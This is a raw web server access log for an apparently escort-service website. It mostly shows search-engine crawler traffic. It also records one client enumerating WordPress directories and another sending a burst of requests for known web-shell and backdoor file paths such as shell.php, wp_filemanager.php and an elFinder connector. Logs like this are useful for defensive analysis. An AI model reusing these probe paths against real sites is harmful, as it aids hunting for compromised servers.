143.198.175.13 - - [06/Jul/2026:14:41:45 +0000] "GET /wp-admin/js/ HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:42:26 +0000] "GET /wp-includes/ HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:44:25 +0000] "GET /wp-includes/PHPMailer/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:44:34 +0000] "GET /wp-includes/pomo/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:44:36 +0000] "GET /wp-includes/blocks/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:44:51 +0000] "GET /wp-includes/js/codemirror/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:45:02 +0000] "GET /wp-includes/js/plupload/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.131.71.19 - - [06/Jul/2026:14:45:16 +0000] "GET /images/escort/escort-24.jpg HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
114.119.131.245 - - [06/Jul/2026:14:46:19 +0000] "GET /?r=10680589071400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
143.198.175.13 - - [06/Jul/2026:14:46:41 +0000] "GET /.well-known/ HTTP/1.1" 200 1013 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:46:45 +0000] "GET /uploads/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:47:27 +0000] "GET /admin/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:45:25 +0000] "GET /wp-content/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:45:43 +0000] "GET /wp-content/IXR/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:46:02 +0000] "GET /wp-content/upgrade/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:43:00 +0000] "GET /wp-includes/css/ HTTP/1.1" 504 8192 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
114.119.135.229 - - [06/Jul/2026:14:43:19 +0000] "GET /?r=10683191021400 HTTP/1.1" 504 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
143.198.175.13 - - [06/Jul/2026:14:43:42 +0000] "GET /wp-includes/sitemaps/ HTTP/1.1" 504 8192 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.131.71.25 - - [06/Jul/2026:14:44:04 +0000] "GET /robots.txt HTTP/1.1" 504 74 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
143.198.175.13 - - [06/Jul/2026:14:44:08 +0000] "GET /wp-includes/IXR/ HTTP/1.1" 504 8192 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:44:12 +0000] "GET /wp-includes/images/ HTTP/1.1" 504 8192 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
114.119.135.229 - - [06/Jul/2026:14:49:17 +0000] "GET /?r=10673197031400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
103.131.71.35 - - [06/Jul/2026:14:44:50 +0000] "GET /robots.txt HTTP/1.1" 504 78 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
114.119.133.14 - - [06/Jul/2026:14:52:13 +0000] "GET /?r=10664292081400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:14:55:11 +0000] "GET /?r=10625695051400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.50 - - [06/Jul/2026:14:58:07 +0000] "GET /?r=10625635031400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:15:01:04 +0000] "GET /?r=10595617011400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
52.22.138.222 - - [06/Jul/2026:15:03:32 +0000] "GET /robots.txt HTTP/1.1" 200 78 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Gort)"
114.119.134.152 - - [06/Jul/2026:15:04:02 +0000] "GET /?r=10595420031400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:15:07:10 +0000] "GET /?r=10588602051400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:15:09:57 +0000] "GET /?r=10585193071400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:15:16:53 +0000] "GET /?r=10566217041400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.193 - - [06/Jul/2026:15:13:24 +0000] "GET /?r=10580790051400 HTTP/1.1" 504 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.193 - - [06/Jul/2026:15:23:50 +0000] "GET /?r=10553139021400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:15:20:34 +0000] "GET /?r=1055855001400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
43.159.143.190 - - [06/Jul/2026:15:24:20 +0000] "GET / HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
114.119.130.199 - - [06/Jul/2026:15:27:17 +0000] "GET /?r=10552524041400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.133.14 - - [06/Jul/2026:15:30:44 +0000] "GET /?r=10548836001400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.193 - - [06/Jul/2026:15:34:13 +0000] "GET /?r=10542647031400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:15:37:40 +0000] "GET /?r=10537132001400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.131.245 - - [06/Jul/2026:15:41:10 +0000] "GET /?r=10528583021400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:15:44:36 +0000] "GET /?r=10524457111400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:15:48:04 +0000] "GET /?r=10521824031400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.229 - - [06/Jul/2026:15:51:32 +0000] "GET /?r=10519299021400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
64.89.161.160 - - [06/Jul/2026:15:54:08 +0000] "GET /admin/plugins/elfinder/php/connector.php HTTP/1.1" 508 288 "-" "ALittle Client"
102.142.109.61 - - [06/Jul/2026:15:54:29 +0000] "GET http://www.delhidreamescorts.com/kanhiya-nagar-call-girls.html HTTP/1.1" 200 25262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"
114.119.134.152 - - [06/Jul/2026:15:55:50 +0000] "GET /?r=10511428041400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.133.14 - - [06/Jul/2026:16:01:55 +0000] "GET /?r=10496649081400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:16:05:24 +0000] "GET /?r=10495606041400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
94.187.20.174 - - [06/Jul/2026:16:06:00 +0000] "GET http://www.delhidreamescorts.com/ashoka-park-extn-call-girls.html HTTP/1.1" 200 25435 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
114.119.133.14 - - [06/Jul/2026:15:58:28 +0000] "GET /?r=10508560041400 HTTP/1.1" 504 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.133.14 - - [06/Jul/2026:16:08:52 +0000] "GET /?r=10479224131400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.50 - - [06/Jul/2026:16:12:19 +0000] "GET /?r=10468867051400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
184.22.33.66 - - [06/Jul/2026:16:15:27 +0000] "GET / HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
184.22.33.66 - - [06/Jul/2026:16:15:27 +0000] "GET /favicon.ico HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
114.119.131.245 - - [06/Jul/2026:16:15:47 +0000] "GET /?r=10462055041400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
43.173.177.244 - - [06/Jul/2026:16:14:37 +0000] "GET / HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
43.173.176.202 - - [06/Jul/2026:16:14:47 +0000] "GET / HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36"
94.239.85.29 - - [06/Jul/2026:16:15:03 +0000] "GET http://www.delhidreamescorts.com/ HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36"
145.239.10.137 - - [06/Jul/2026:16:17:08 +0000] "GET /system123.php HTTP/1.1" 403 69753 "http://delhidreamescorts.com/system123.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
145.239.10.137 - - [06/Jul/2026:16:18:00 +0000] "GET /7.php HTTP/1.1" 508 288 "http://delhidreamescorts.com/7.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
114.119.158.50 - - [06/Jul/2026:16:19:15 +0000] "GET /?r=10449729071400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:16:22:43 +0000] "GET /?r=10446844001400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:16:26:14 +0000] "GET /?r=10440396041400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.131.245 - - [06/Jul/2026:16:29:40 +0000] "GET /?r=10439881081400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:16:33:07 +0000] "GET /?r=10437460051400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:16:36:35 +0000] "GET /?r=10419673011400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.131.245 - - [06/Jul/2026:16:40:03 +0000] "GET /?r=10413125061400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
98.93.48.31 - - [06/Jul/2026:16:43:23 +0000] "GET / HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
114.119.146.70 - - [06/Jul/2026:16:43:30 +0000] "GET /?r=10387641071400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
20.46.121.148 - - [06/Jul/2026:16:49:21 +0000] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:37 +0000] "GET /ucpfr.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:37 +0000] "GET /class-walker-footer-dev.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:37 +0000] "GET /gtd7.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:38 +0000] "GET /wp-ws68.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:38 +0000] "GET //av.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:38 +0000] "GET /wp-includes/theme-compat/navbar.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:38 +0000] "GET /oivcl.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:39 +0000] "GET //Bean.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:39 +0000] "GET /h2h.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:39 +0000] "GET //wp-file.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:39 +0000] "GET //insta.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:40 +0000] "GET /wp-includes//0IJm2.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:40 +0000] "GET //admin1.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:40 +0000] "GET /twinklingly.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:40 +0000] "GET /rof.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:41 +0000] "GET /wp-includes/certificates/bak.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:41 +0000] "GET /wp-includes//css.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:41 +0000] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:41 +0000] "GET //wp-cloak.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:41 +0000] "GET /lddxs.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:42 +0000] "GET /wp-includes//BVeA9.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:42 +0000] "GET /flox.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:42 +0000] "GET /wp-content/plugins/about.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:42 +0000] "GET /wp-includes/fonts/inat.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:43 +0000] "GET /htaccess.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:43 +0000] "GET /solo1.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:43 +0000] "GET //wander.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:43 +0000] "GET /fffm.php?p= HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:44 +0000] "GET /bhfnd.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:44 +0000] "GET /wp-content/plugins/index.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:44 +0000] "GET /uploads/update_with_pics.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:44 +0000] "GET /wp-includes//otFoY.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:45 +0000] "GET /zjggu.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:45 +0000] "GET /museu/yhweq.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:49:45 +0000] "GET /ffhma.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:01 +0000] "GET /weozh.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:01 +0000] "GET /opsqt.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:01 +0000] "GET /zznmg.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:01 +0000] "GET /nwwha.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:02 +0000] "GET /file5.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:02 +0000] "GET //shell.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:02 +0000] "GET /css//Mtir.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:02 +0000] "GET /wp-includes//0iWhh.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:03 +0000] "GET /class-wp-filesystem.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:03 +0000] "GET //wp-includes/item.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:03 +0000] "GET /db.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:03 +0000] "GET /wp-content/about.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:04 +0000] "GET /wp-includes/fonts/send.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:04 +0000] "GET /wp-includes//wp-includes/admin-bar.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:04 +0000] "GET /pkmoj.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:04 +0000] "GET /wp-includes/css/ty.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:05 +0000] "GET /wp-includes//shell20211028.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:05 +0000] "GET /kopyw.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:05 +0000] "GET /images/contacto.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:05 +0000] "GET /kq1.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:06 +0000] "GET /.well-known//checkbox.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:06 +0000] "GET /wp-admin//wp-samp.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:06 +0000] "GET /wp-admin/maint/yes.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:06 +0000] "GET /w.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:07 +0000] "GET /wp-includes//jvc.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:07 +0000] "GET /jrpga.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:07 +0000] "GET //wp-includes/admin-bar.php HTTP/1.1" 508 288 "-" "-"
